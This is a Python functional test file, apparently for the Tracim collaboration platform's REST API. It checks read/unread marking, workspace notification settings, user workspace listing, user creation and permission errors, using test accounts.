            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False

    def test_api_set_content_as_unread__ok__200__with_comments_read_comment_only(self):
        """Marking only the comment unread makes the parent content show as unread."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
        api.mark_read(firstly_created)
        api.mark_read(comments)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # before: read (use admin.user_id rather than a hard-coded id)
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id,
                content_id=comments.content_id,
                user_id=admin.user_id,
            )
        )
        # after: the unread comment makes the parent show as unread
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
class TestUserSetWorkspaceAsRead(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/read

    Fix over the previous revision: the PUT calls passed a spurious
    ``content_id=...`` keyword to a format string that has no
    ``{content_id}`` placeholder (``str.format`` silently ignores extra
    keyword arguments); the dead argument is removed.
    """

    def test_api_set_content_as_read__ok__200__admin(self):
        """Admin can mark a whole workspace as read for another user: every content flips to read."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_unread(main_folder)
        api.mark_unread(firstly_created)
        api2.mark_unread(main_folder)
        api2.mark_unread(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # before: both contents unread for test_user
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
        assert res.json_body[1]["content_id"] == main_folder.content_id
        assert res.json_body[1]["read_by_user"] is False
        # mark the whole workspace as read for test_user
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
                workspace_id=workspace.workspace_id, user_id=test_user.user_id
            )
        )
        # after: both contents read for test_user
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        assert res.json_body[1]["content_id"] == main_folder.content_id
        assert res.json_body[1]["read_by_user"] is True

    def test_api_set_content_as_read__ok__200__user_itself(self):
        """A user can mark a whole workspace as read for himself."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_unread(main_folder)
        api.mark_unread(firstly_created)
        api2.mark_unread(main_folder)
        api2.mark_unread(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # before: both contents unread
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
        assert res.json_body[1]["content_id"] == main_folder.content_id
        assert res.json_body[1]["read_by_user"] is False
        # mark the whole workspace as read
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
                workspace_id=workspace.workspace_id, user_id=test_user.user_id
            )
        )
        # after: both contents read
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        assert res.json_body[1]["content_id"] == main_folder.content_id
        assert res.json_body[1]["read_by_user"] is True

    def test_api_set_content_as_read__err__403__other_user(self):
        """A plain user may not mark a workspace as read on behalf of another user (HTTP 403)."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_unread(main_folder)
        api.mark_unread(firstly_created)
        api2.mark_unread(main_folder)
        api2.mark_unread(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # test_user tries to mark the workspace read for the admin account
        res = self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
                workspace_id=workspace.workspace_id, user_id=admin.user_id
            ),
            status=403,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserEnableWorkspaceNotification(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate
    """

    def test_api_enable_user_workspace_notification__ok__200__admin(self):
        """An admin can activate workspace notifications for any member."""
        # Build a workspace with one member whose notifications start disabled.
        session = get_tm_session(self.session_factory, transaction.manager)
        admin = session.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=session, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        user_api = UserApi(current_user=admin, session=session, config=self.app_config)
        group_api = GroupApi(current_user=admin, session=session, config=self.app_config)
        member = user_api.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=[group_api.get_one_with_name("users")],
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        role_api = RoleApi(current_user=admin, session=session, config=self.app_config)
        role_api.create_one(member, workspace, UserRoleInWorkspace.READER, with_notif=False)
        transaction.commit()
        assert role_api.get_one(member.user_id, workspace.workspace_id).do_notify is False
        # Activate notifications as admin.
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
                user_id=member.user_id, workspace_id=workspace.workspace_id
            ),
            status=204,
        )
        # Re-read the role through a fresh session to observe committed state.
        session = get_tm_session(self.session_factory, transaction.manager)
        role_api = RoleApi(current_user=admin, session=session, config=self.app_config)
        assert role_api.get_one(member.user_id, workspace.workspace_id).do_notify is True

    def test_api_enable_user_workspace_notification__ok__200__user_itself(self):
        """A user can activate workspace notifications on his own role."""
        session = get_tm_session(self.session_factory, transaction.manager)
        admin = session.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=session, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        user_api = UserApi(current_user=admin, session=session, config=self.app_config)
        group_api = GroupApi(current_user=admin, session=session, config=self.app_config)
        member = user_api.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=[group_api.get_one_with_name("users")],
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        role_api = RoleApi(current_user=admin, session=session, config=self.app_config)
        role_api.create_one(member, workspace, UserRoleInWorkspace.READER, with_notif=False)
        transaction.commit()
        assert role_api.get_one(member.user_id, workspace.workspace_id).do_notify is False
        # Activate notifications while authenticated as the member himself.
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
                user_id=member.user_id, workspace_id=workspace.workspace_id
            ),
            status=204,
        )
        session = get_tm_session(self.session_factory, transaction.manager)
        role_api = RoleApi(current_user=admin, session=session, config=self.app_config)
        assert role_api.get_one(member.user_id, workspace.workspace_id).do_notify is True

    def test_api_enable_user_workspace_notification__err__403__other_user(self):
        """A plain user cannot toggle notifications for somebody else."""
        session = get_tm_session(self.session_factory, transaction.manager)
        admin = session.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=session, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        user_api = UserApi(current_user=admin, session=session, config=self.app_config)
        group_api = GroupApi(current_user=admin, session=session, config=self.app_config)
        default_groups = [group_api.get_one_with_name("users")]
        member = user_api.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=default_groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        other_member = user_api.create_user(
            email="test2@test2.test2",
            password="password",
            name="boby",
            groups=default_groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        role_api = RoleApi(current_user=admin, session=session, config=self.app_config)
        role_api.create_one(member, workspace, UserRoleInWorkspace.READER, with_notif=False)
        role_api.create_one(other_member, workspace, UserRoleInWorkspace.READER, with_notif=False)
        transaction.commit()
        assert role_api.get_one(member.user_id, workspace.workspace_id).do_notify is False
        # other_member tries to change member's notification setting: 403.
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        response = self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
                user_id=member.user_id, workspace_id=workspace.workspace_id
            ),
            status=403,
        )
        assert isinstance(response.json, dict)
        assert "code" in response.json.keys()
        assert response.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserDisableWorkspaceNotification(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate
    """

    def test_api_disable_user_workspace_notification__ok__200__admin(self):
        """An admin can deactivate workspace notifications of any member."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
        transaction.commit()
        role = rapi.get_one(test_user.user_id, workspace.workspace_id)
        assert role.do_notify is True
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=204,
        )
        # re-read role through a fresh session to see the committed state
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        role = rapi.get_one(test_user.user_id, workspace.workspace_id)
        assert role.do_notify is False

    def test_api_disable_user_workspace_notification__ok__200__user_itself(self):
        """A user can deactivate workspace notifications on his own role.

        FIX: this test was misnamed "test_api_enable_..." although it
        exercises the deactivate endpoint; renamed for consistency.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
        transaction.commit()
        role = rapi.get_one(test_user.user_id, workspace.workspace_id)
        assert role.do_notify is True
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=204,
        )
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        role = rapi.get_one(test_user.user_id, workspace.workspace_id)
        assert role.do_notify is False

    def test_api_disable_user_workspace_notification__err__403__other_user(self):
        """A plain user cannot deactivate notifications of another user."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        test_user2 = uapi.create_user(
            email="test2@test2.test2",
            password="password",
            name="boby",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
        rapi.create_one(test_user2, workspace, UserRoleInWorkspace.READER, with_notif=False)
        transaction.commit()
        role = rapi.get_one(test_user.user_id, workspace.workspace_id)
        assert role.do_notify is True
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        res = self.testapp.put_json(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=403,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserWorkspaceEndpoint(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces
    """

    fixtures = [BaseFixture, ContentFixtures]

    def test_api__get_user_workspaces__ok_200__nominal_case(self):
        """
        Check obtain all workspaces reachables for user with user auth.
        """
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace_api = WorkspaceApi(session=dbsession, current_user=admin, config=self.app_config)
        workspace = workspace_api.get_one(1)
        app_api = ApplicationApi(app_list)
        default_sidebar_entry = app_api.get_default_workspace_menu_entry(
            workspace=workspace
        )  # nopep8
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get("/api/v2/users/1/workspaces", status=200)
        res = res.json_body
        workspace = res[0]
        assert workspace["workspace_id"] == 1
        assert workspace["label"] == "Business"
        assert workspace["slug"] == "business"
        assert workspace["is_deleted"] is False
        assert len(workspace["sidebar_entries"]) == len(default_sidebar_entry)
        for counter, sidebar_entry in enumerate(default_sidebar_entry):
            # BUG FIX: these lines previously used "=" (assignment) instead of
            # assertions, so the sidebar entries were never actually verified.
            assert workspace["sidebar_entries"][counter]["slug"] == sidebar_entry.slug
            assert workspace["sidebar_entries"][counter]["label"] == sidebar_entry.label
            assert workspace["sidebar_entries"][counter]["route"] == sidebar_entry.route
            assert workspace["sidebar_entries"][counter]["hexcolor"] == sidebar_entry.hexcolor
            assert workspace["sidebar_entries"][counter]["fa_icon"] == sidebar_entry.fa_icon

    def test_api__get_user_workspaces__err_403__unallowed_user(self):
        """
        Check obtain all workspaces reachables for one user
        with another non-admin user auth.
        """
        self.testapp.authorization = ("Basic", ("lawrence-not-real-email@fsf.local", "foobarbaz"))
        res = self.testapp.get("/api/v2/users/1/workspaces", status=403)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
        assert "message" in res.json.keys()
        assert "details" in res.json.keys()

    def test_api__get_user_workspaces__err_401__unregistered_user(self):
        """
        Check obtain all workspaces reachables for one user
        without correct user auth (user unregistered).
        """
        self.testapp.authorization = ("Basic", ("john@doe.doe", "lapin"))
        res = self.testapp.get("/api/v2/users/1/workspaces", status=401)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] is None
        assert "message" in res.json.keys()
        assert "details" in res.json.keys()

    def test_api__get_user_workspaces__err_400__user_does_not_exist(self):
        """
        Check obtain all workspaces reachables for one user who does
        not exist
        with a correct user auth.
        """
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get("/api/v2/users/5/workspaces", status=400)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.USER_NOT_FOUND
        assert "message" in res.json.keys()
        assert "details" in res.json.keys()
class TestUserEndpoint(FunctionalTest):
    # NOTE: a misplaced "# -*- coding: utf-8 -*-" cookie was removed here;
    # coding declarations are only effective on the first two lines of a file.
    """
    Tests for GET /api/v2/users/{user_id} and POST /api/v2/users
    """
    fixtures = [BaseFixture]
    def test_api__get_user__ok_200__admin(self):
        # An admin can read the full detail of any user.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "bob"
        assert res["timezone"] == "Europe/Paris"
        assert res["is_deleted"] is False
        assert res["lang"] == "fr"
    def test_api__get_user__ok_200__user_itself(self):
        # A user can read his own detail.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
        res = res.json_body
        assert res["user_id"] == user_id
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "bob"
        assert res["timezone"] == "Europe/Paris"
        assert res["is_deleted"] is False
    def test_api__get_user__err_403__other_normal_user(self):
        # A normal user cannot read another user's detail.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        # NOTE(review): unlike the sibling tests, this create_user call does
        # not pass lang="fr" — presumably irrelevant for a 403 check.
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            do_save=True,
            do_notify=False,
        )
        test_user2 = uapi.create_user(
            email="test2@test2.test2",
            password="password",
            name="bob2",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user2)
        uapi.save(test_user)
        transaction.commit()
        user_id = int(test_user.user_id)
        self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
        res = self.testapp.get("/api/v2/users/{}".format(user_id), status=403)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
    def test_api__create_user__ok_200__full_admin(self):
        # An admin can create a user with a full set of parameters.
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        params = {
            "email": "test@test.test",
            "password": "mysuperpassword",
            "profile": "users",
            "timezone": "Europe/Paris",
            "lang": "fr",
            "public_name": "test user",
            "email_notification": False,
        }
        res = self.testapp.post_json("/api/v2/users", status=200, params=params)
        res = res.json_body
        assert res["user_id"]
        user_id = res["user_id"]
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "test user"
        assert res["timezone"] == "Europe/Paris"
        assert res["lang"] == "fr"
        # check that the created user is really persisted with its password
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert user.email == "test@test.test"
        assert user.validate_password("mysuperpassword")
    def test_api__create_user__ok_200__limited_admin(self):
        # Creating a user with only an email yields sensible defaults.
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        params = {"email": "test@test.test", "email_notification": False, "password": None}
        res = self.testapp.post_json("/api/v2/users", status=200, params=params)
        res = res.json_body
        assert res["user_id"]
        user_id = res["user_id"]
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "test"
        assert res["timezone"] == ""
        assert res["lang"] is None
        assert res["auth_type"] == "unknown"
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert user.email == "test@test.test"
        assert user.password is None
    def test_api__create_user__err_400__email_already_in_db(self):
        # Creating a user with an already-registered email must fail.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        params = {
            "email": "test@test.test",
            "password": "mysuperpassword",
            "profile": "users",
            "timezone": "Europe/Paris",
            "lang": "fr",
            "public_name": "test user",
            "email_notification": False,
        }
        res = self.testapp.post_json("/api/v2/users", status=400, params=params)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.EMAIL_ALREADY_EXIST_IN_DB
    def test_api__create_user__err_403__other_user(self):
        # A normal user is not allowed to create users.
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        uapi.save(test_user)
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        params = {
            "email": "test2@test2.test2",
            "password": "mysuperpassword",
            "profile": "users",
            "timezone": "Europe/Paris",
            "public_name": "test user",
            "lang": "fr",
            "email_notification": False,
        }
        res = self.testapp.post_json("/api/v2/users", status=403, params=params)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserWithNotificationEndpoint(MailHogFunctionalTest):
    """
    Tests for POST /api/v2/users with email notification enabled, and for
    PUT /api/v2/users/{user_id}/trashed (user deletion).
    """
    config_section = "functional_test_with_mail_test_sync"
    def test_api__create_user__ok_200__full_admin_with_notif(self):
        # Creating a user with email_notification=True sends an account email.
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        params = {
            "email": "test@test.test",
            "password": "mysuperpassword",
            "profile": "users",
            "timezone": "Europe/Paris",
            "public_name": "test user",
            "lang": "fr",
            "email_notification": True,
        }
        res = self.testapp.post_json("/api/v2/users", status=200, params=params)
        res = res.json_body
        assert res["user_id"]
        user_id = res["user_id"]
        assert res["created"]
        assert res["is_active"] is True
        assert res["profile"] == "users"
        assert res["email"] == "test@test.test"
        assert res["public_name"] == "test user"
        assert res["timezone"] == "Europe/Paris"
        assert res["lang"] == "fr"
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        user = uapi.get_one(user_id)
        assert user.email == "test@test.test"
        assert user.validate_password("mysuperpassword")
        # check mail received
        response = self.get_mailhog_mails()
        assert len(response) == 1
        headers = response[0]["Content"]["Headers"]
        assert headers["From"][0] == "Tracim Notifications <test_user_from+0@localhost>"
        assert headers["To"][0] == "test user <test@test.test>"
